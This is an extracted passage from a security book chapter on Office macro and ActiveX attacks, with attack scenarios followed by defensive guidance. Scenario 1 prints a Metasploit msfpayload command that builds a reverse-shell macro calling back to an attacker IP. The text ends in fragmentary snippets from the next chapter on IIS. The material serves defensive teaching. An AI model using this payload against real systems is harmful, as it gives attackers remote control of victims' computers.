Dangers Associated with Macros and ActiveX 97 some of them should open your eyes to what the reality is as far as macro attack capabilities are concerned. The real danger associated with macro and other client-side attacks is understand- ing that many of the attacks can easily be launched with little knowledge of how the attack works. In addition, the typical target for a macro attack is your common computer user who may not be fully aware of the dangers that exist today. Successful attacks can lead to total compromise of a network or simply provide the foothold an attack needs to make further attacks. Scenario 1: Metasploit Reverse TCP Connection Most organizations today deploy the Microsoft Ofce suite programs to enable employees to complete business-related tasks; however, our attacker has some other plans for leveraging the functionality of Microsoft Ofce. As time passes and tools become more robust, the capability to exploit vulnerable systems comes easier for both penetration testers and attackers alike. This first scenario uses the extremely popular Metasploit Framework (www.metasploit.com), Microsoft Ofce, and a dash of imagination to stir up a recipe for disaster. Metasploit has the capability of gener- ating a variety of payloads that penetration testers and attackers can use against target systems. In this scenario, the attacker decides he wishes to perform an attack against an unsuspecting victim in an attempt to gain control over the victim’s operating system. Leveraging the knowledge of how macro exploits operate, our attacker uses Metasploit Visual Basic payloads to generate a macro that may be added to almost any Microsoft Ofce product. Metasploit has the capability to create payloads that most antivirus vendors will not even detect. During the writing of this chapter, the malicious e-mail and file was checked against 41 virus scanners and none detected the malicious payload. The following block of code represents the attacker creating the VBA code that will be used in his malicious document. Part of the command determines what type of payload will be used, whereas other segments of the command are used to set the le name and the IP address the macro will try to connect to. If this attack is successful, the macro will attempt to “call home” to the attacker at the IP address provided. sevendeadliest@theforce$: ./msfpayload windows/meterpreter/reverse_ tcp LHOST=192.168.1.135 V macrovirus.vba Once a Visual Basic payload is created using the Metasploit Framework, the attacker imports the macro module into a Microsoft Ofce document that looks legitimate enough for an employee to feel comfortable opening and sends the docu- ment via e-mail to his victim or a list of victims. As you can see in Figure 5.1, the contents of the macro created by Metasploit can be opened and viewed with a stan- dard text editor. The Metasploit Framework also has the functionality of creating listeners for incoming connection requests from our malicious Microsoft Word document. CHAPTER 5 Office – Macros and ActiveX98 Depending on the level of access, the user has the attacker now perform a series of tasks in order to further his foothold within the network. Some of these additional tasks include but are not limited to obtaining password hashes, gathering network information, pivoting attacks toward other hosts, escalating privileges, and installing root kits. For this reason, we should always ensure employees have only the minimal computer permissions to complete the work required under the context of their role within the organization. FIGURE 5.1 Viewing msfpayload Generated Code FIGURE 5.2 Viewing Open Meterpreter Session Figure 5.2 displays a listener being started and awaiting incoming connection requests. In Figure 5.2, you may notice that a meterpreter has opened a session num- bered 1. This is our first indication that a victim has opened the malicious document and the macro has been executed as planned. The attacker then executes the sysinfo command to determine the name, type, and the patch level of the system that has been compromised. The only warning raised was the Microsoft Ofce notication about the potential danger of executing macros, but then again, what end user really pays attention to those when they just want to get their work done? Dangers Associated with Macros and ActiveX 99 NOTE Although the scenario mentions the attacker uploading files “to his favorite Web server” in the last paragraph, this does not imply he legitimately owns the server. Malicious sites used for this type of attack are usually hosted on servers that have already been compromised and are now under the control of our attacker. In addition, the attacker can use the systems compromised with the ActiveX attack as Web servers for future attacks. This is one of many steps an attacker may take to help conceal his true identity. NOTE A root kit is a collection of tools that are usually uploaded to a system after it has been compromised. The tools in the root kit can be used to facilitate further attacks, sniff traffic, and maintain access. Root kits are usually small in size and are designed to evade detection by antivirus scanners. Root kits may be disguised to look like and operate like legitimate system files. For instance, it is possible to use root kits to hook into other processes and applications, allowing for them to be concealed for extended periods of time. This scenario has demonstrated to us that the power of a well-crafted macro-based exploit should not be underestimated. Implementing controls to prevent automatic execution of macros for Microsoft Ofce applications can really help reduce the likelihood of these types of attacks. These and other mitigation techniques will be discussed in the section “Macro and ActiveX defenses” of this chapter. Scenario 2: ActiveX Attack via Malicious Website As discussed earlier in the section “ActiveX Attacks” of this chapter, ActiveX-based attacks can cause all sorts of problems for your network security program if controls are not implemented. The next scenario involves the attacker crafting a malicious ActiveX control and embossing it within a Web page that will be used as part of the attack. The ActiveX control itself will perform several tasks when it is activated and has already been programmed by our attacker. In many cases, the attacker do not have to program ActiveX controls as it is fairly easy to nd ones that are already developed at various Web sites on the Internet. The purpose of this scenario is to focus on the attack and not necessarily how to program an ActiveX control. If you wish to learn how to program ActiveX components, Microsoft’s MSDN Web resources provide a lot of information on the topic with code examples. Once the attacker has crafted the ActiveX exploit and included it within the mali- cious Web page, he can now upload the Web page to his favorite Web server for his victims to visit. The attack can direct visitors to his malicious site using a variety of methods. Some methods include using hyperlinks in forum posts, sending e-mails to groups of victims with a link to the site in the e-mail, and sending instant messages including hyperlinks that the victims can click on. CHAPTER 5 Office – Macros and ActiveX100 In this scenario, the attacker crafts an e-mail with very important-sounding content that requires immediate action on the part of the victim. The attacker sends the e-mail to the victims identified in his e-mail list and waits for the e-mail recipients to visit the Web site the attacker set up earlier. Upon visiting the malicious Web site, the user will most likely be prompted to click on the annoying message to install the ActiveX control required to use some of the elements of the Web site. At this point, the ActiveX control is successfully installed and is ready to perform the tasks as programmed. Figure 5.3 provides an overview of the attack thus far. The ActiveX control designed by our attacker has been programmed to contact a separate server on the Internet and use the TFTP protocol to download a root kit spe- cifically designed for this attack. The tools in this root kit are used to gather data from the client system by way of sniffing and logging keystrokes and scouring the compro- mised system for documents that may contain sensitive information. The root kit can be constructed with a variety of tools to meet whatever the attackers needs are. Once sensitive information has been obtained from the victim’s computer, the data can then be transmitted to a third and final server where the attacker can later retrieve the data and use it for future attacks. At this point, the root kit can be con- figured to continue gathering information and send the information to the remote FIGURE 5.3 ActiveX Attack ActiveX Attack 3. Root kit downloaded 4. Data uploaded to server 1. Receive email and visit malicious site 2. ActiveX control installed Future of Macro and ActiveX Attacks 101 server at regular intervals. This type of attack can obviously cause a lot of trouble if the victim is an enterprise or small company and the data stolen contains client data or personal identifiable information. Prolonged access can lead to millions of dollars in losses and buy our attacker a nice vacation villa in Germany. FUTURE OF MACRO AND ACTIVEX ATTACKS As you can see from the overwhelming success of macro and ActiveX attacks, it is likely that the basic attack methodology used by macro-based attacks will be around as long as Ofce applications allow code to execute. Since the convenience and flexibility provided by allowing this to occur is so critical to the success of the applications, it is not conceivable that Microsoft will remove this functionality from its programs. As newer, more powerful languages and APIs are written Microsoft will continue to add to the feature set it offers. Programmers and attackers will then be able to leverage these new capabilities to do their bidding and possibly take advan- tage of security holes created by the new features. An example of how this can cause issues relates to .NET assemblies and their use by macros in Ofce 2003 and 2007. The recommendations from Microsoft in regards to macro security are to use the default security settings within the applications to help prevent malicious code from running. Unfortunately, this only applies to the following items according to the Microsoft Knowledge Base 1 : • Microsoft VBA macros • COM add-in • Smart tags • Smart documents • Extensible Style sheet Language (XSL) documents As you can see, this does not include the capability to secure any code from referenced .NET assemblies. This is because the .NET framework controls the secu- rity for the .NET assemblies rather than the application calling it. Therefore, the security settings within Ofce applications have no effect on the way that .NET code is run, even if it is being called out of an Ofce application. Although there are ways to secure the .NET framework, it may still have system wide affects and are not as manageable as the security settings within Ofce. This particular gap will continue to exist until attackers take advantage of it to the point that Microsoft sees the value in eliminating it. The point, however, is not to claim this as some large hole within Ofce security; rather, the idea is to point out this as an example of how macro attacks will mature over time. The human element also plays a very large part in the success of many attacks and as humans, we are the slowest to adapt and conform to security concepts. In general, these attacks require you to perform some action to activate the attack. This may be a user visiting a malicious Web site, opening a document from an unknown source, or even lowering the security settings within Ofce to get a known-good macro to CHAPTER 5 Office – Macros and ActiveX102 run without bugging you about security policies preventing its execution. No matter how well Microsoft designs these systems from a security perspective, this is also not something likely to change. MACRO AND ACTIVEX DEFENSES The bad news is that macro and Active X attacks are a class of attacks, which are both popular and effective, and will continue to morph and take advantage of new vulnerabilities and therefore will continue to be a risk no matter what you do. The good news is that because these attacks are so popular there are many ways to defend yourself or your organization against these attacks without having to jump through a lot of hoops. Deploy Network Edge Strategies The network edge is both your first and last line of defense against attacks using active content such as macros and ActiveX. To understand this, you need to think about how the malicious content can get into your network and how it can deliver any payload back out of it. In one sense, these attacks are passive in nature because the attacker is not actively attacking a specic target but instead, the attacker is relying on some action taken by an unsuspecting user to activate the attack. Malicious content must pass through the network edge to get to where it can be activated, so this is where you build the rst line of defense that was discussed in the section “Using AntiVirus and AntiMalware.” In many cases, the mechanism for delivery of Ofce documents with malicious content is through e-mail and therefore, it is possible to use your e-mail server to employ defensive strategies to prevent the content from ever getting into the hands of a user. Besides scanning for viruses, e-mail servers can filter for tip-offs such as mismatched headers or malicious sources based on blacklists. They can also be set to only allow plain text e-mails (which wouldn’t effect attachments, but does kill all active content within the e-mails themselves). From an outbound perspective, edge strategies are employed to ensure that the malicious content that has been executed within your environment can’t actually deliver any value to the attacker. These strategies are based on filtering the data as it tries to leave your network and can include implementing egress filtering on fire- walls, or deploying an application layer gateway or a data loss prevention (DLP) solution. In each of these cases, the trafc from your internal network is scanned as it attempts to cross the network boundary and is allowed or disallowed (or possibly quarantined) based on the policies/rule set you have dened. Using Antivirus and Antimalware You should install Antivirus and Antimalware software at all layers of your environment to ensure that viruses and malware are detected and neutralized. This includes integration with the border devices, with e-mail servers, and on an end-user Macro and ActiveX Defenses 103 device. The reason you need this at all layers is to eliminate the threat from your network as soon as possible, but not all trafc can be scanned at each layer. For example, let’s say your friend knows you enjoy collecting Star Wars action figures and he wants to send you a picture that he had found in an ad for the last one you need for your collection. Since he knows that your company monitors your e-mail, he decides to encrypt the le and names it something generic to circumvent your e-mail lters. Unfortunately, this action means that the content of the encrypted file won’t be scanned until someone opens it rather than it being detected at net- work edge. Therefore, it is vital that scanning occurs at whatever point the mail is opened. In addition to layering protection throughout the network, controls should also be configured to ensure that viruses are detected before they can actually run. To accomplish this, antivirus and antimalware software should be set to use heuristics as well as the specic virus/malware signatures in the les. The software should also always have real-time scanning enabled as well as a full scan of the hard drive should be performed at least once a week. Using all of these options is a trade-off because it does take more processor cycles to use your antivirus and antimalware software in this manner, but in almost all cases it is worth it. Update Frequently Like Windows, Ofce applications sometimes have vulnerabilities and these vulnerabilities are patched through updates. Updates to Ofce applications should either be downloaded and installed automatically on each individual machine or downloaded and integrated into whatever patching process you have within your environment. Windows Update allows for both Windows and Ofce patches to be downloaded at the same time and this option is available for all versions of Ofce newer than Ofce XP. Even more important than keeping Ofce up-to-date is to keep your antivirus and antimalware signatures as current as possible. This software should be set to automat- ically download and install new signature files as soon as they are released (although establishing an internal site that updates from the manufacturer rather than having each computer download individually is a good strategy for accomplishing this). In their infancy, antivirus signature les did sometimes cause issues with computer systems and therefore testing was needed before deploying these les. However, this occurrence is now so rare that the risk associated with not using the newest signatures far outweighs the risk that a signature file will cause a problem on your systems. Using Office Security Settings Regardless of the version or type of Ofce application you are using, there are security settings that control how the application deals with active content and you should use these to ensure the security of your computer. In older versions of Ofce programs, the default settings generally allow all active contents to run, which is an issue from CHAPTER 5 Office – Macros and ActiveX104 The security settings are separate for each Ofce application and are accessed through the menus of the particular Ofce application you are trying to secure. Prior to Ofce 2007, these menus are generally located through the “Tools” menu and are relatively easy to nd. Ofce 2007 restructured the interface and relocated the secu- rity settings into an area named the “Trust Center” (shown in Figure 5.4), but made it much more difficult to get the settings. To access the Trust Center in Ofce 2007 applications, you must open the general menu by clicking on the Ofce symbol in the top left-hand corner of the application. This will open up a menu that has a small button in the bottom right-hand corner that says “Word Options” (or “Excel Options,” “Access Options,” etc.… depending upon the application). After clicking on the Options button, the Options menu is brought EPIC FAIL Oversecuring an environment inevitably leads to undersecuring. Many companies pick the most restrictive settings possible when implementing security into their Office applications. Unfortunately, this usually causes issues with people not being able to do their work. When security settings impact the business, leaders rarely have the stomach for taking the time to tweak the security to get it to the right level and instead demand the application be allowed to run with the lowest security settings possible. Of course, this opens the business up to all kinds of attacks over the long term. Some of these attacks vectors would never have been available if a more reasonable security approach had been taken. a security perspective. Microsoft has changed this philosophy in recent years, so the defaults for the newer versions are much more restrictive (but can be annoying to end-users because they tend to be set to ask for permission before running the content). FIGURE 5.4 Microsoft Word Trust Center Macro and ActiveX Defenses 105 Table 5.1 Trust center options Menu Use and options description Trusted publishers Contains a list of Certificate Authorities that the office application should trust for digital signing Trusted locations Contains a list of paths that the office application should trust when opening files. By default, this only includes the locations for templates and add-ins from Microsoft. This list affects how Office operates based on other settings within the Trust Center menu, and adding the locations where you keep your documents will weaken the security of your computer Add-ins A list of options you can choose for how the Office application deals with add-ins This list generally includes options for disabling all applications add-ins requiring digital signatures by a trusted publisher for any add-ins and for disabling user notification when Office stops an unsigned add-in from running ActiveX settings Provides different options for how Office deals with ActiveX controls for all documents stored in locations not in the Trusted Locations list. By default, this is set to prompt the user before enabling ActiveX controls with minimal restrictions Also provides an option for always running in “safe mode” Macro settings Provides different options for how Office deals with ActiveX controls for all documents stored in locations not in the Trusted Locations list. By default, this is set to disable all macros with notification Also provides an option to trust access to the VBA project object model Message bar Provides options for whether the Message Bar shows within Office External content (Excel only) Provides different options for securing data connections and links within an Excel workbook Privacy options Provides options related to the Office online, including checking Office documents that are from, or link to, suspicious Web sites as determined by Microsoft Also provides an option for bringing up the Document Inspector that searches for hidden content within a document up and you will select Trust Center from the context menu on the left side of the screen. This will bring up information in the right-hand pane, but not the Trust Center itself. The last step is to locate and click the Trust Center Settings… button within the right pane, which will bring up the menu shown in Figure 5.4. All of the Ofce applications have the same security setting options from a general perspective, but they are not exactly the same. For example, Excel has an additional option for “External Content” that other Ofce products (such as Word and PowerPoint) do not. Table 5.1 discusses each of the menus within the Trust CHAPTER 5 Office – Macros and ActiveX106 Center and what they are used for from a general perspective. Additional information about Trust Center can be obtained from Microsoft’s Web site. B Ofce 2007 defaults attempt to strike a balance between security and usability. It allows you to manage all of the Trust Center settings through Group Policy, if you are in a domain environment. For earlier versions of Ofce, you should go through the security options within the Tools menu and determine which settings are necessary within your environment. Working Smart In one of the earlier tips in the chapter, the importance of training end users to work smart in regards to the security of their computers was discussed. Working smart includes understanding the basic security processes everyone should use when deal- ing with their computer. An obvious example would be to delete the spam e-mail promising you “more powerful orgasms” before opening the virus.exe attachment that came with it. Almost everyone who sees an e-mail like this would immedi- ately delete it; however, just scrolling past an e-mail in Outlook with malicious code imbedded may execute the code even if you don’t intend to open it. Rule #1 for working smart is to think before you click on something. We generally think of this in relation to visiting a Web site, but applying the same thought process can be benecial when working with Ofce because of the amount of active content currently being used in these applications. A large percentage of the e-mails, docu- ments, and spreadsheets people share with each other include some embedded links or buttons which may redirect you to a Web site or run some macro. Take a second and ask yourself whether you have ever opened the document before, then run a virus scan against any documents before you open them for the first time (most virus scan- ners place a “scan” option in the menu that appears when you right-click on a file). Also, consider whether you trust the source where you got the document. Did you download it from a legitimate Web site like Microsoft.com or was it something you found as you were searching for a free MP3 of the newest “Weird Al” song? Did you ask your boss to post a document you needed on your group’s SharePoint site or did someone just randomly e-mail it to you with a sort of suspicious subject line? Always think twice before making a decision to click on something that may cause security issues. If you take a second to think about where the document came from, and whether you actually trust that source, then you can take actions before opening the docu- ment. If it came to you out of the blue from someone, then conrm that they sent it to you by calling or sending them an e-mail (make sure it is a new e-mail because opening the questionable e-mail to reply “Did you send this to me?” defeats the purpose). When in doubt, you should always check with your network administra- tors or security staff before doing anything you suspect; otherwise, it may reduce the security of your network. B http://ofce.microsoft.com/en-us/help/ha100310711033.aspx [...]... yourself from attackers Endnote 1 http://support .microsoft. com/kb /82 8 384 107 This page intentionally left blank chapter Internet Information S ­ ervices – Web Service Attacks 6 Information in This Chapter • Microsoft Internet Information Services (IIS) Overview • How IIS Attacks Work • Dangers with IIS Attacks • Future of IIS Attacks • Defenses Against IIS Attacks Early in 2009, the Ball State University... impact on Ewww .microsoft. com/technet/security/bulletin/MS09-053.mspx Fwww.ietf.org/ Ghttp://tools.ietf.org/html/rfc49 18 Hwww .microsoft. com/technet/security/bulletin/ms09-020.mspx 111 112 CHAPTER 6  Internet Information Services – Web Service Attacks ­ Web sites deployed on IIS and were wide spread due to ISAPI extensions being enabled as part of the default configuration How IIS Attacks Work Attacks against... authentication, session management, and serving content; this chapter will review some of the attacks that can be used against IIS directly Awww .microsoft. com/technet/security/advisory/971492.mspx Bwww.zdnetasia.com/news/security/0,39044215,620542 38, 00.htm 109 110 CHAPTER 6  Internet Information Services – Web Service Attacks ­ Microsoft IIS Overview The history of IIS reaches back to the Windows NT 3.51 operating... demonstrated by the attacks in this chapter, you can see that combining t ­echnology and some ingenuity can allow attackers to execute very precise and effective attacks Preparing for these attacks and thinking like your adversary will help you minimize the impact of some of these attacks Unfortunately, security is a process and no product you buy off the shelf will protect you against all attacks Luckily,... basis in later versions of Microsoft WebDAV In addition, using WebDAV tools, a developer can even publish content to a Web site through mapped network drives from the developers system to the Web server Microsoft s WebDAV follows the guidelines specified by the Internet Engineering Task Force (IETFF) Request for Comments (RFC) 4918G – HTTP Extensions for WebDAV In the past, the Microsoft WebDAV implementation... Windows Server 20 08 Windows Server 20 08 Windows Server 2003 Windows 2000 Windows NT 4.0 Windows NT 3.51 Chttp://news.netcraft.com/ Dhttp://news.netcraft.com/archives/web_server_survey.html Microsoft IIS Overview server directories FTP provides administrators and users the capability to ­ransfer t large quantities of data to and from FTP servers with little concern for administrative overhead Microsoft s... the Microsoft WebDAV implementation has had several vulnerabilities that were publicly disclosed and subsequently patched by Microsoft Recently, Microsoft has issued another Security BulletinH, addressing an elevation of privilege vulnerability in the WebDAV component of IIS ISAPI Microsoft s Internet Server Application Programming Interface (ISAPI) comes in the form of extensions and filters as they... also be installed and run on client operating systems such as Windows XP and Windows Vista As new server class operating systems have been released, Microsoft has continued to improve the capabilities and appeal of the IIS product Throughout its history, Microsoft has deployed updated versions of IIS with each new release of the supporting server platform allowing administrators to implement new features... vulnerability found in the Internet Information Services (IIS) ­ eb-based W Distributed Authoring and Versioning (WebDAV) component as described in Microsoft Security Advisory (971492)A and as reported by ZDNet Asia.B This d ­ iscovery markets yet another vulnerability in the Microsoft IIS product and once again turned its focus back to how even products that have been around for many years can still contain vulnerabilities... installed in order to use the FTP server component provided by Microsoft As with other components found in IIS, the FTP service has been the target of vulnerability researchers for quite some time One of the recent vulnerabilities discovered affecting the FTP component allows remote code execution or may cause a denial of service (DoS) as outlined in Microsoft Security Bulletin MS09-053.E Although this is . http://support .microsoft. com/kb /82 8 384 This page intentionally left blank CHAPTER 109 6 INFORMATION IN THIS CHAPTER • Microsoft Internet Information Services (IIS) Overview • How IIS Attacks Work •. How IIS Attacks Work • Dangers with IIS Attacks • Future of IIS Attacks • Defenses Against IIS Attacks Internet Information Services – Web Service Attacks Early in 2009, the Ball State University. kinds of attacks over the long term. Some of these attacks vectors would never have been available if a more reasonable security approach had been taken. a security perspective. Microsoft has